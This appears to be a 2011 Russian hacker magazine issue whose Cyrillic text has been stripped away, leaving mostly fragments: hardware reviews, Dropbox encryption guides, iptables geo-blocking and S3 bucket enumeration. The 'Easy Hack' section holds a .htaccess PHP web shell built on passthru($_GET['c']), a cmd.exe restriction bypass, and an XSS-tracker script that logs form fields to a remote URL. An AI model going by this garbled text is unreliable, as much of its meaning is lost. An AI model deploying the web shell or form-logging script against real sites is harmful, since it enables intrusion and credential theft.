x 08 (151) 2011

PHDAYS
2011

$ 500 000 APPSTORE

Windows 7 Portable:
Dropbox
@Mail.Ru
HD Moore: Metasploit
Generation Carberp

DNS
REBINDING

SAME ORIGIN POLICY
. 56

3 -
: 12 , 6
3 .

, ? ? .
- .

INTRO

,
whitehat-. ,
. : 142 .
,
.
, : ,
- .
. -
,
.
, .
PHD, Chaos

Constructions (27-28 ).
- DEFCON-
DEFCON-Russia.
, IT .
: http://defcon-russia.ru.
,
. ,
,
. , ,
.
nikitozz, . .
vkontakte.ru/xakep_mag

Content
MegaNews
Ferrum
Samsung SyncMaster T27A950
2.0
PC_Zone
Dropbox
Proof-of-Concept
Windows 7 Portable
Easy-Hack
CONFidence 2011
CTF
PHDays
DNS Rebinding
GPU
1000
0day
TDL4
- TDL4
Cloud Hacking
X-Tools
Generation Carberp
Win32/TrojanDownloader.Carberp
J2ME-
iptables
Web-
Kohana + MVC = love
@Mail.Ru
mail.ru
SMS- Android
Scripting Layer for Android:
SYN/ACK
SCOM:
ERP !
ERP-: , Open Source
SELinux: !
Anti DNS pinning
MALWARE
Metasploit
HD Moore
AppStore
game-:
Flash iPhone
Capture The Flag
Dropbox: - ,
PHREAKING
Shield- Arduino
FAQ UNITED
WWW2
FAQ
8.5
web-
Dropbox: ,

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
PHREAKING
(po@kumekay.com)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)


>PR-
(grigorieva@glc.ru)

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906

> TECHNOLOGY
(komleva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)

>
(polikarpova@glc.ru)
>
, birarova@glc.ru
>
( )
(tatarenkova@glc.ru)
>
(ilk@glc.ru)
(goncharova.n@glc.ru)
>
(yakovleva.s@glc.ru)
> -
(alekseeva@glc.ru)
> MAN TV

: 8-800-200-3-999
>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .

>

>


.

. ,
,
.


.
.


:
content@glc.ru

, , 2011

>
(kosheleva@glc.ru)
>
(lukicheva@glc.ru)
> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

MEGANEWS
Mifrill (mifrill@real.xakep.ru)

Meganews
ICPC !

. ICPC ,
-- (),

... ,
, . ,
11 .
, , ,
8
.
:
, (8 );
, (7 );
- , (7 );
, (7 );
, (7 ).
,
,
. ,
, ,
, !

Microsoft Security Essentials .


10,66% 43 000 , OPSWAT
. ,
Avira Antivir Personal 10,18%. AVAST!
8,66%.

GEOHOT
GeoHot
Facebook.
Sony : Facebook
...
(Facebook is really an amazing place to work... first hackathon over).
.
,
9- Facebook software engineer. ,
GeoHot
Sony. , ,
.
Facebook , iPad (, ),
. ,
.


BITTORRENT


BitTorrent. TranzSend Broadcasting Network , BitTorrent Inc Kontiki
Inc 7.301.944
(

) BitTorrent. ,
.

uTorrent, ,
BitTorrent
!

2007
,

1999 , ,

- BitTorrent.
Tranz-Send Broadcasting Network
,

, BitTorrent

,

, P2P- .
,

.
.

?
$8-9 , 60% .
,
.



. .

, , ,
:).

SMS .


GS1. ,

SenseIT, GSM-
SIM-,
,

.



(
-10 50 ),
. ,

GS1 ,
, , /
.
3 000 .

70% Android- -
, Motorola.
, CPU
.


,
,

.

500 (6,2 )

.
300
(3,7 ) .

,
,
.

DDoS .
,
-


.

,
,
.
303b

( ),

. ,
,
DDoS
.

:
2011 95%.

GOOGLE

Google ,
2009 . Google Voice Search Android, Symbian iOS,
Google Chrome . -, , ,
Chrome, . , ,
,
.
, Google
. Google Images
TinEye. , -


( )
-, . ,
. , , ,
Facebook.
Google , (
Google) ,
.

WEXLER.HOME 903


, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.

. WEXLER.HOME
750 . ,
, .

WEXLER.HOME 903 Windows 7 .


64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).

Intel Core i5-650 3,2 - 4 . CPU



Turbo Boost, (, ). , .

GeForce GTX 460,


Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.

WEXLER.HOME 903
4 , .

Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.


Intel Labs, ,

.
, -

. Termite
,

, . Termite
. ,
, , .
: ,
. ,
,
.
, , ,
.
NICTA, Open Kernel Labs
SOSP.
:
bit.ly/m3dtvt.

,
Foursquare 10 .


Apple.
-,
Mac OS X
Lion. . Mac App Store
29,99 .
250 , , ,
iOS.
:
- -


. Mission Control

Launchpad.

Mac App Store. AirDrop
Mac .
-, Apple iOS 5, . 24 !
iPhone Dev Team.
-

,
. , ,
iOS iPod touch.
Cydia iSSH.
.
-,
. Apple
,
.
iTunes Match.
: scan-and-match
( ) iTunes
,
$25
.
,
iTunes,
CD .
,

, ,
TuneCore.
,
, . ,
, ,

.

NOKIA
Nokia,
Microsoft , IM for Nokia.
Nokia X6, Nokia 5230, Nokia N8, Nokia E7,
Series 40
.
Ovi Store. ,
,

Google
Talk, Windows Live Messenger, Yahoo!
Messenger
. ,
, ,
iMessage.

iOS 5 ,
.

ICANN
, .
, .apple, .ibm .


Sony
, ,
. ,

. Sony (
),

Sega Pass .

1,3
- Sega Pass.
, ,
.

,
, ,
email ,
( ).
,
LulzSec,
, Sega

. LulzSec, Bethesda, Nintendo, ,


, ,
Dreamcast . , ,

.
,
NATO E-Bookshop. ,
,
, .
,
E-Bookshop , , , , .

, ,
. ,
XSS.


Fluke Networks. OptiView
XG Network Analysis Tablet

.

. ,
Fluke Networks, ,
,
:


.
, ,
10 ,
.
2,5 , 10,25- 1024x738,
,
.
Windows 7, Intel Core Duo 1,2
. OptiView XG 30
000

10 /. ,
,

.

BITCOIN

Bitcoin,
peer-to-peer-.
, ,

- . , Bitcoin
. , .
BC MtGox, .
MtGox ( 60
), MD5. ,
,
( 1000 ). , -
, : MtGox
$17 . , ,
, , . ,

432 BC, $8 6,6%
. ,
. , Bitcoin
. , BC
-2011, , . , ( Infostealer.
Coinbit) Bitcoin, , Bitcoin. ,
, , , .

, ...
Microsoft
Rustock, .
. , -
, Microsoft .
,
( ,
) .

, Microsoft ,
Rustock.

. Microsoft ,
, .
noticeofpleadings.com, .
, ,
. ,
, , :). , ,
Rustock, ( 2006 )
- .
.

Facebook, , .
6 ( 155,2
149,4 ).

SKYPE
Skype
. , Microsoft ( Government
Security Program) , .

(skype-open-source.blogspot.com) (
1.x/3.x/4.x),
( , AES RSA ).

,
Skype, , .
, , ,
. , ,
,

Skype . ,
,
-.


, 3D
, , ,
,
- , 3D. ,
(
), ,
, 3D , .
, , 3D,
, ,
.
. ,
. ,

, ,
,
2D. .
, $5
(
). ,
:
, .
, , ,
,
. 3D
!

,
, 2600.

WEXLER TAB 9701


,
, . Wexler

Android 2.3 WEXLER.TAB 9701.
:
ARM- 1,2 ;
512 ;
9,7 SuperTFT- 1024768
IPS
;
8 -.
, , ,
1080p (FullHD).


(, ,
), mini-HDMI.

USB-. (IEEE 802.11 b/g/n) 3G ( Wideband Code Division Multiple Access).

(G-) GPS-,
A-GPS. , - 7000 9
(
Wi-Fi).


12 , 700 . 2011

13,900 .

, Red Hat ( )
$1 .

QR-
QR-
,
, .
,
.
QR-. ,
, ,
.
5


.
, ,
10 .
2011 . QR-
: www.q5g.nl. , ,
,
33 ,
.


SPYEYE


, ,
. ,
, . security-
Trusteer: , SpyEye
Air Berlin AirPlus.
AirPlus :
,
,
. Air Berlin :
,
.
( ) ,
Trusteer.

Chaos Constructions 2011. 11-


27 28
, -.


, ,

. ,


. . ,


,
, .

,
.
, ,

,
(). , ,
?

?,

.
,
.

,
... ,


.

RSA SECURID
RSA Security 40 SecurID,
, - ,
. EMC ,
, SecurID
Lockheed Martin ( - F-22
F-35), . SecurID , . , , ,
30 60 .
, , . ,
,
.
RSA
, SecurID,

,
,
. RSA
,
, .
SecurID ,
, RSA . SecurID
, ,
.

www.xakep.ru

FERRUM

:
: 27"
: 1920x1080
: TFT TN
: 300 /2
: 1000:1
: 3
: , RJ-45, 2x USB 2.0,
2x HDMI, , CAM-,
, headphone
: 6,2

28000 .

!
Samsung SyncMaster T27A950
- - ,
CRT-
- ( ).
, ,
, - .
,
, ,
,
-, .
, ? .
. , , ,
.
,
Samsung SyncMaster T27A950. , .


. , 27 . ,
Samsung SyncMaster T27A950


. , .
, , .

. -, , . -, .
, . , .


.
14 ,
27 ,
.
.

. ,
DVI-D,
D-Sub. HDMI, ,
, ,
BD-. ,

-
Samsung SyncMaster T27A950 ,
. , ,
--.
,
,
Samsung SyncMaster
T27A950 -.

, .

USB 2.0. ,
, ,
.
-, -
. , - , Samsung SyncMaster T27A950
. ,
USB 2.0 .
-- Wi-Fi-, ( !)
USB-.
,
RJ-45 . , Samsung SyncMaster T27A950
.

3D. ,
2D
3D (, , ).
.


,
Samsung SyncMaster T27A950 , . ,
.
, , .
,
,
. , .


Datacolor Spyder3Elite, :
, 45 60 .
, .
-
.

sRGB. . sRGB
, ( )
.
.
.

Samsung SyncMaster T27A950 , , ,


.
.
- , ,
, . ,
, ,
, . z


FERRUM

2.0
,

.
: ,
..
2.0.

. , ,
. ,
.
-, . ,
,
, ,
, ,
.
-, . , , ,
( ),
. , ,
, .
, , .
, ,
, high-end.
, , , ,
Focal Tools, .
, , ,
-
. ,
, . Armin Van Buuren
Ray Brown ( ,
,
), Jackyl ( ) Diana Krall
(

). , .
.


:
DVD- Alpine DVA-9861Ri
+ 2RCA to mini-jack

:
Focal Tools
IASCA Official Sound Quality Reference CD
AMT SQ

:
Creative Gigaworks T40 series II
Edifier C200
Edifier R2000T
JBL Duet III
Microlab H11
Sven Stream Mega



Microlab Solo 15 . ,
Edifier C200.
, ,
, , ,
.
,
.

3900 .

Creative Gigaworks
T40 series II
:
: 2.0
: AUX, - X-30
:
: 216 RMS
/: 80
:
:
: 32518090

Gigaworks T40 series II ,


.
. ,
, .
. , ,
. - Creative Docking Station
X-30 iPod,
. , iPod, ,
AUX-,
.
,
, ,
, .
,
. . ,
.
.
- iPod.
.
.

4670 .

Edifier C200
:
: 2.0
: AUX
:
: 225 RMS
/: 85
:
:
: 320253196 (), 22321872 ()

,
Hi-Fi-, Edifier C200.
-, , , ,
, . -, Edifier C200
LED-,
/ .
, .
, AUX,
, , DVD-,
,
. , ,
Edifier C200 .
.

. ,
, , .
. ,
, . Edifier C200 ( ,
) . ,
200 .
.
, .

.


5850 .

3800 .

Edifier R2000T

JBL Duet III

: 2.0
:
:
: 230 RMS
/: 95
:
:
: 320253x196

: 2.0
:
:
: 210 RMS
/: 70
:
:
: 304117117

R2000T ,
,
.
,
.
, , , .
, . , , ,
, .
, 200. 6,5- ,
.
.
R2000T , , ,
.
.

Harman/Kardon
.
-.

( 4 ) .
.
,
.
, . ,
.
.
, . , , ,

. , , ,
, .

.
.


, .
.
.


3900 .

Microlab Solo 15
:
: 2.0
:
:
: 240 RMS
/: 80
:
:
: 315238168

,
. ,
. , , ,
: 13-
, .
, , . : , ,
,
.
:
; , ,
; ,
.
, Solo 15
.
,
.

3960 .

Sven Stream
Mega
:
: 2.0
:
:
: 260 RMS
/: /
:
:
: 360255255

Hi-Fi, .
,
mini-jack-
. ,

.
6,5- .
.
,
, . .
Stream Mega .
,
. ,
(,
), .

.
.
.


>> coding

PC_ZONE
Step (twitter.com/stepah)

Dropbox

Dropbox:
,
Dropbox 5
. 25 .
,
.

Dropbox . 4
. , ,
, security- (pastebin.com/yBKwDY6T).
, ,
Dropbox.
,
,
. , SSL-, (AES-256).
,
, , ,
, Dropbox
. .
, -, ,
- .
,


, Dropbox. .

EncFS

, wiki (wiki.dropbox.com),
. ,
,
. ,
Dropbox TrueCrypt FreeOTFE
.
: , .
, .
: ,
(, 1 ). ,
Dropbox, . ,
wiki
file-by-file-,
. EncFS,


.
EncFS - ( , Dropbox)
.
-
. ,
, EncFS
Dropbox. , Dropbox
. ,
Linux FUSE (Filesystem
in Userspace),
. ,
Mac OS X, Windows. .

Windows
Dropbox
BoxCryptor (www.boxcryptor.com), .
AES-256.

, , Dropbox, ,
.
,
EncFS Windows.
BoxCryptor ,
.
,
Dropbox,
. , ,
.
,
, ,
. Advanced Mode,
BoxCryptor.
, Dropbox .
, BoxCryptor ,
,

:
, Dropbox. , .
BoxCryptor
Dropbox, (
X:). Dropbox , . .
BoxCryptor, , (
). .
BoxCryptor encfs6.xml.
EncFS , ,
. , ,
, Dropbox.
, ,
, EncFS Windows encfs4win
(gitorious.org/encfs4win). , , .
, BoxCryptor, Dokan (dokandev.net), FUSE Windows
.

Linux
Linux
EncFS , .
(>= 1.7),
. , , ( 1.6). , ,
Ubuntu 10.10, . . EncFS
GUI- Cryptkeeper:
sudo apt-get install encfs cryptkeeper

Cryptkeeper
Applications System Tools Cryptkeeper
:


X:
1. Cryptkeeper Import EncFS
folder.
2. ,
( BoxCryptor).
3. ,
.
Cryptkeeper
EncFS: , Cryptkeeper > /home/step/
Documents/Safe. .
GUI-, EncFS- :
encfs ~/Dropbox/BoxCryptor/ ~/BoxCryptor


, .

Mac OS X
EncFS Mac OS X, ,
- .
, .
, EncFS
, \ .
:
1.
EncFS,
. XCode(developer.apple.com). 3- .
2. MacFUSE (code.google.com/p/macfuse), Mac OS X FUSE,
EncFS. MacFUSE.pkg,
.
3. EncFS,
(
Homebrew), :
ruby -e "$(curl -fsSL https://raw.github.com/gist/323731)"


SecretSync
4. EncFS
. Homebrew ,
( ):
brew install encfs

5. EncFS !
BoxCryptor ( ~/Dropbox/BoxCryptor)
, (, ~/
Dropbox/BoxCryptor):
encfs ~/Dropbox/BoxCryptor ~/BoxCryptor

GUI- MacFusion
(www.macfusionapp.org)
EncFS (thenakedman.wordpress.com/encfs).

BoxCryptor EncFS, , ,



BoxCryptor . , -
, .
Portable- BoxCryptor,
. ,
,
. . Portable-
BoxCryptor , . ,
, Dropbox
DropboxPortableAHK (dropportable.ho.am).

Dropbox
7
(bit.ly/dropbox_fail) Dropbox. , config.db.
%APPDATA%\Dropbox SQLite.
host_id
. . .
. config.
db ,
. !
, ,
host_id .

-.
19 Dropbox ,
,
.
26 GitHub Dropship
(github.com/driverdan/dropship), ,
Dropbox. , , .


.
github Dropbox.
Dropbox .

EncFS Mac OS X
Dropbox.
( AES-256)
SecretSync (getsecretsync.com/ss).
Windows Linux,
OS X . ,
Java, ,
.
, BoxCryptor :).
. , ,
- ? , ,
, ,
.
Wuala (www.wuala.com),
.
,
Dropbox. Windows, Linux, Mac,
iPhone Android.
Wuala RSA-2048,
AES-128.
. ,
, .
,
. ,
? ... . -,

19
. , . Dropbox
, ,
, 1% .

. :
Wuala,
( , 4
).
, Wuala- ,
, .
, ,
.
1 , , ( ,
Dropbox), .
, Wuala .
, .
Dropbox ,

. , Wuala .
,
, .
Java-. Dropbox+BoxCryptor
. , ,
, . z


PC_ZONE
Johnny-K (www.johnny-k.ru)

$500 000

APPSTORE
game-:
Flash iPhone


MacBook Pro.
iPhone - Ragdoll Cannon. , Objective-C
, Mac OS .

, 2008
Flash Ragdoll Cannon.
, .
: (


, box2d),
, ,
. . , - , casual- .

Ragdoll Cannon.
$600,
$600, $8000.
, ,
,
$25 000 ,
, . Ragdoll Cannon
Flash-, , ,
.

09/2010 ][.

, , ,
. AppStore ,
iPhone/iPod/iPad. ? .
Objective-C, iPhone/iPad, .
cocos2d,
,
iOS.
- . ,
(
) , ,
-.
, AppStore
Ragdoll Blaster.
, , .
Ragdoll Blaster , -
Ragdoll Cannon. , , ,
.
. Apple
, , . .
iOS , -.

,
Flash-. :
, , - FDGEntertainment, AppStore.
Ragdoll Blaster. ,



Physics Gamebox. AppStore


(
).
:)? . Objective-C
, , , - . , ,
,
- .
,
- , .
AppStore
FDG Physics Gamebox.
: Ragdoll Cannon
Roly-Poly Cannon ( Flash-).
. ,
.
,
(Apple 30 , ).
, ,
, .

HTTP://WWW
links

:
www.johnny-k.ru.

cocos2d
iPhone:
habrahabr.ru/blogs/
macosxdev/122383.

iPhone OS. :
habrahabr.ru/blogs/
macosxdev/86597.

,
, .
.
, ,
, .
Flash-
Cover Orange. ? ,
iOS. ,
.
. , .
,
( ) , . ?
, ,

-. ? ! ?
, ! ? ! ,
! , (
),
. Flash- Cover Orange


+ = Cover Orange

:
100 . : iPhone/
iPad ! . Objective-C
: ,
. , ,
cocos2d. , .
, 80 .
.
iPad ,
( ),
. , Apple iPhone 4
Retina, .
, .

Apple-

.
( ),
, , Apple, ,
3gs 3g.

. 688 .
3 .
Xcode
- :
. ? -
2008 , - , ,
. , , .
, ,
. ,
.

2010 Cover Orange AppStore


iPad, $1,99.
, Top
25 ( ).
.
! iPhone.
99 . .
!
: , ,
, ,
, ,
-. ,
.
, , .
. .

, Apple
. , . 200 ,




iPhone,
iPhone. ,
. ,
.
iPod Touch, iPhone, , GSM-.
Mac, Intel. , .
(
, ).
Mac OS X
( MacOS X + VirtualBox = , bit.ly/iTJOec).
, ,
iOS , Mac iPhone/iPad
. -.
. .

iPhone OS
iPhone SDK (developer.apple.com/iphone).
IDE (XCode),
(GCC), (GDB), , iPhone .
XCode IDE, , , Visual Studio,
.
, Apple
, ( ,
AppStore). iPhone
Objective-C.
C C++, .
,
Obj-C. ,
, .
: Java ActionScript 3.
cocos2d.

. , !

, - .
, Objective-C
.
,
. , ,
, , . -
Apple. - ,
, :
,

. . , - .
.

, Cover Orange . -
. -
-,

. , , ,
.

,
, . AppStore,
,
. ?
, .
, ,
Apple,
, ( appfigures.com),
. : , , ? ,

Apple, .
. , .
, 99%
. ,
, , .
, .
. 30 50
Apple. , ,
,
. , ,
,
-. Apple, , .
. ,
, ( ).
, . ,
,
. . , .

. .
.
, ,
, .
$0,99. , ,

. .
Mac OS. cocos2d
.
-, .
, .
AppStore Mac OS.
? -.
, ? -
, , .
-? . -
. ,
, iOS! z


PC_ZONE
Step (twitter.com/stepah)
twitter.com/stepah

,
:
. ,
. , ,
( )
.
,

, .
,
IP-. ,
.

IP-

, .
IP- (
/ IP)
, , , .

WIP-Base WIPmania.com.
:
IP-

IP-.
1. IP- (
/ IP).
, ,

WIP-Base WIPmania.com.
IP-.

-, , SQL, CIDR, :
WIP-API ( API );


WIP-Plugin (WorldIP- Mozilla


Firefox);
WIP-Map ( IP-
).
: , , , ,
. ,
.
2.
- ,
.
iptables, . ,

,
,
.
geoip xtables-addons iptables,
,
WorldIP- WIPmania
. :
1. xtables-addons (xtables-addons.sourceforge.net).
2. geoip.

URL static.wipmania.com/static/worldip.iptables.tar.gz. ,
(,
).
3. .
http-
:
iptables -A INPUT -p tcp --dport 80 -m geoip --src-cc CN -j DROP

WIP-Map
iptables -A INPUT -p tcp --dport 80 -j ACCEPT

-
(, ,
):
iptables -A INPUT -p tcp --dport 80 -m geoip --src-cc RU,UA,BY -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP


nginx ngx_http_geo_module, ( bit.ly/jIHTaA). z


PC_ZONE

Proof-of-Concept
-

Google. ,
"index of" + "mp3" -html -htm -php
mp3. .
, (
www.exploit-db.com/google-dorks)
, ,
. ,
. , ,
, ,
. , ,
DigiNinja, Amazon S3.
S3 Simple Storage Server, Amazon. ,
.
( $0,055 ), ($0,01 10 000 ),
( $0,050 ). , .
bucket ( Amazon S3),
. ,
xtoolz/scanner.zip bucket
xakep, , URL http://xakep.s3.amazonaws.com/xtoolz/scanner.zip.
bucket , .

. , -

Bucket Finder


, All.
DigiNinja? S3
bucket, ,
, .
:
<Error>
<Code>AccessDenied</Code>
<Message>Access Denied</Message>
<RequestId>7F3987394757439B</RequestId>
<HostId>kyMIhkpoWafjruFFairkfim383jtznAnwiyKSTxv7+/CIHqMBcqrXV2gr+EuALUp</HostId>
</Error>
Public bucket

bucket:
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>digipublic</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>my_file</Key>
<LastModified>2011-05-16T10:47:16.000Z</LastModified>
<ETag>"51fff3c9087648822c0a21212907934a"</ETag>
<Size>6429</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>

bucket (Access
Denied), .
URL, bucket
(%bucket_name%.s3.amazonaws.com)
URL. , wordlist
bucket ,
.
, , ,
(
).
, : 403 Forbidden (
) 200 OK ( ).
, ,
. DigiNinja Ruby Bucket Finder (www.digininja.org/projects/bucket_finder.php), .
wordlist
(2226 ) . 848
131 bucket.
9683 , ,
. z


PC_ZONE

Windows 7 PORTABLE

Windows 7,
.
,
: ,
, ,
.
, , Live-,
- recovery-. , , , ,
, , (
). .
Linux, UBCD4Win, Windows XP,
,
Barts PE Builder (www.nu2.nu/pebuilder). ,
, , , ,
, : Windows 2000/XP/2003. :
,
Windows 7. .

,
.
WinBuilder ,
:
LiveXP Windows XP
.
Win7PE Windows 7.
VistaPE-CAPI Vista.
NaughtyPE Windows XP -.
MultiPE Vista
Windows 7.
Win7PE, .

WinBuilder

PeBuilder ,
WinBuilder. , Windows PE (
Windows, CD/DVD/
USB-). , Windows Automated Installation
Kit (WAIK)


, Windows 7
:
1. Windows 7 x86 x64, SP1.
2. WinBuilder (winbuilder.net).
exe-,
.


3. Windows Automated Installation Kit for Windows 7 (WAIK).
Windows
1,7 ,
Microsoft (bit.ly/poNn7I),
.
4. Driverpack (driverpacks.net/driverpacks/latest)
,
.
,
, Chipset, LAN,
WLAN Mass Storage driver.

,
.
1. Windows Automated
Installation Kit for Windows 7.
ISO, , : KB3AIK_EN.iso StartCD.exe.
Windows AIK
Setup .
, , WinBuilder
, WAIK
( ).
2. Windows 7 ISO - .
3. WinBuilder.exe -
(, C:\WinBuilder) .
:
.
4. WinBuilder
. ,
Download Center.
, .
:
updates.boot-land.net ( );
win7pe.WinBuilder.net/SE ( Win7PE).
(
Recommended).
Complete
, Download.
5. - WinBuilder
,
, .
bcdedit.exe
(Windows 7) C:\WinBuilder \Projects\
Tools\Win7PE_SE\x86 ( C:\WinBuilder \Projects\Tools\

WAIK
Win7PE_SE\x64 64- ).
:
imagex.exe
wimgapi.dll
wimmount.inf
wimmount.sys
wimserv.exe

WAIK. . WinBuilder ,
.

, ,
. .
1. , Win7PE
SE. Source:
Windows 7.
.
2. , .
Drivers.
%GlobalTemplates%\Drivers_x86.
Explore
. Driverpack, .
,
:
.
3. Tweaks,
. , wallpaper, , .
.
4. WriteMedia
Copy to USB-Device,
USB-, .
5. Play ,
. ,
, :
,

DVD
dvd




. ,

Windows 7.

INFO

info
:
Avira AntiVir:
reboot.pro/14817.
Malwarebytes AntiMalware:
reboot.pro/9351.
Salas Password
Renew:
reboot.pro/2720.


WinBuilder

VMware
( , ). ,
,
WinBuilder. ,
, .
, .


, Win7PE_x86.ISO
WinBuilder\ISO.
6. ,
,
. VirtualTest
( , qEmu, VirtualBox, Virtual PC, VMware). (Best Emulation), WinBuilder
VMWare Workstation, .
.
.
7. , . WinBuilder HP USB Disk Storage Format Tool
USB-.
FAT32 (
) NTFS. .
Grub4Dos, . : -,
( ,
), -, Part List
Whole disk (MBR) Dont search floppy.
Install, ,
Grub4Dos, . : WinBuilder
USB-.
Windows 7 .


1. ,
Windows 7
(SP1). ,
, . ,
, , WinBuilder .
2. - , ,
. - ,
, . Finalize
Save log file . WinBuilder
: , -
.
3. , www.paraglidernc.com/WinBuilder (
WinBuilder).
. Projects\Paraglider\WinBuilder.chm.
4.
Portable- (, portableapps.com),
.

USB-, ,
, ,
. :
Windows 7, . Aero
: .
Windows ( regedit),
PENetwork
( ) Opera USB .
, .

()

,
, (
). . \
WinBuilder\Projects\Win7PE_SE\Apps GUI WinBuilder. , ,
, ,
- . .
.
, base64.
, (
).
( Total Commander),
.
:
?. , :
Reboot.pros App Scripts (reboot.pro/forum/65);
Al Jos (al-jo.99k.org).
, Wireshark
Winpcap ( : reboot.pro/14842).
Apps/Network,
.
.
, ,
. Tools Create script...,
WinBuilder . , Softperfect Netscan


(www.softperfect.com/products/networkscanner),
:
//
[main]
Title=NetScan
Description=Netscan from Softperfect
Selected=True
Level=5
Version=1
NoWarning=False
Download_Level=0
// ,
[variables]
%ProgramTitle%=Netscan
%ProgramEXE%=netscan.exe
%ProgramFolder%=netscan
//
[process]
// netscan , ( )
CopyProgram,%ScriptDir%\%ProgramFolder%
//
Add_Shortcut,StartMenu,Netscan
Add_Shortcut,Desktop,Netscan
// DLL, . WinBuilder
Require_FileQ,mgmtapi.dll
Require_FileQ,msvcrt.dll
Require_FileQ,KERNEL32.dll
Require_FileQ,snmpapi.dll
Require_FileQ,USER32.dll
Require_FileQ,WS2_32.dll
Require_FileQ,wsnmp32.dll

reboot.pro,
.
, .
- ,
.
Components Additional Files,
. Directory Example,
, , ,
.

? !
, ,
. ,
. , ( , ), .
, , ,
, -. ,
,
? z



GreenDog (agrrrdog@gmail.com)

Easy Hack
1

:

.

:
, . .
. ?

. ,
- , ,
. ,
bit.ly/hPFQ4i.

, .
- , .
,
web-, .
Jeremiah Grossman .
( ) Top
Ten Web Hacking Techniques (bit.ly/gmlXLZ). : OWASP BlackHat USA .
,
- , ,
. , .
.

-:

:
.

:
,
. : ,
, ( ) ,
.

. ,
, :).
www.securityaegis.com. , ,
:
1) Start -> Run -> gpedit.msc;
2) User Configuration -> Administrative Templates;
3) System -> Prevent access to the command prompt.

, cmd.exe bat-/


cmd.exe bat
cmd-. , vbs
. .
Windows XP .
, cmd.exe
command.com. DOS-,
,

. :
command.com , - (ipconfig, ) .
, cd.
, :
cd | ipconfig

- ,
, . : !
:).

: HTTPS
.

:
HTTP
,
Man-in-the-middle.
, , , . HTTPS HTTP, SSL/
TLS-. SSL
. , ,
, .
, HTTPS . ,
.
. , , MiTM. ! , . HTTPS
,
, web-
www.ssllabs.com/ssldb/analyze.html. : , ,
,
. ,
! - , :).

HTTPS :)

: HTTPS-.

:
.
arp-spoofing-
HTTPS- , .
, MiTM
, ,
(, -,
), - :). HTTPS, .
:)... . ,
.
la-la-la.key. ? Wireshark:
1) HTTPS-;
2) Edit Preferences;

HTTPS-
3) Protocols SSL( );
4) RSA key list :
5) IP- , , ,
192.168.0.100,443,SSL,:\la-la-la.key;
6) Apply.


:
MS SQL.

:
, ,
/ .
, ,
-. MS SQL
, , . SQL-:
Select @@version

Nmap:
nmap -sV -p1433 <targets>

. www.sqlteam.com/article/sql-server-versions
( )
MS SQL
MS. ,
. , , , .

MS SQL

: -
.

:
,
Eldar Marcussen (bit.ly/mm1ynI). - CMS, Apache .htaccess.
, - , -
, .
, .htaccess
- Apache. httpd.conf , , ,
. .htaccess
httpd.conf (
AllowOverride).
, , .htaccess ,
. , .htaccess
, web- ,
- , .
:

:
XSS-.

:
XSS . , XSS- :
stored/ XSS ,
;
reflected/ XSS
,
.
.
, , .
, XSS -


<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
#### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?> #####

, . , .htaccess .
.htaccess , php-.
php- , ,
'c' c .
: http://victim.com/path/.htaccess?c=command.
. Apache
.htaccess, php . Eldar
Marcussen ,
, .
bit.ly/jBHjNz,
bit.ly/lu9CuD.

, .
,
- : <script>alert(document.cookie); </script>. ,
,
.
- , , . ,
HttpOnly,
/ Cookie JavaScript,
: HTTP. ,
. XSS
, .
, XSS-,
, , ,

.
XSS-tracker: bit.ly/9zZU68. , ,

, -
. ? XSS
. . ? ,
.
iframe, , XSS.
, iframe.
, . ,
. , bit.ly/jETYQx, .
, - ,
, ,
. XSS-tracker
.
jQuery .
:
$('body').children().hide();
$('<iframe>')
.css({ position: 'absolute', width: '100%', height: '100%',
top: 0, left: 0, border: 0, background: '#fff' })
.attr('src', 'http://example.com').appendTo('body');

,
.
$('<iframe>').load(function() {
this.contentWindow; this.contentDocument;
});

.
$('body', this.contentDocument)
    .find('a')
        .click(function() {
            log({event: 'click', 'from': location, 'href': this.href,
                 'target': this.target});
        })
    .end()
    .find('form')
        .submit(function() {
            log({event: 'submit',
                 from: location,
                 action: $(this).attr('action') || location,
                 fields: $(this).serialize()
            });
        })
    .end();

, jQuery, . -
, . . ,
api.jquery.com/category/selectors.
, ,
password : alert($('input[name|="password"]').val());.

XSS-tracker iframe
. GET-:
function log(what) {
    what["_"] = Math.random();
    try {
        $.get(logUrl, what);
    } catch (e) {
        var i = new Image();
        i.src = logUrl + "?" + encodeURIComponent($.param(what));
        $(i).load(function() {$(this).remove();}).appendTo("body");
    }
};

. ,
, . :). .
1. - XSS- IE8 Chrome.
2. (XSS+iframe) frame busting. ,
. :).
3. , - - .
,
. , ,
web-, , :).
,
. .
, XSS-. ,
. HttpOnly +
HTML-.
. , .
XSS-. XSS-tracker,
. XSS-tracker
,
,
. XSS+CSRF. .
PS. aka D1g1 ( Security DVD) ,
:).
PS2.
Defcon-Russia (www.defcon-russia.ru). z



iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)

, -: Joomla,
vBulletin WordPress ( ) . , ,
, !

01

SQL- VBULLETIN 4.0.X =>


4.1.2

TABLE_PREFIX .
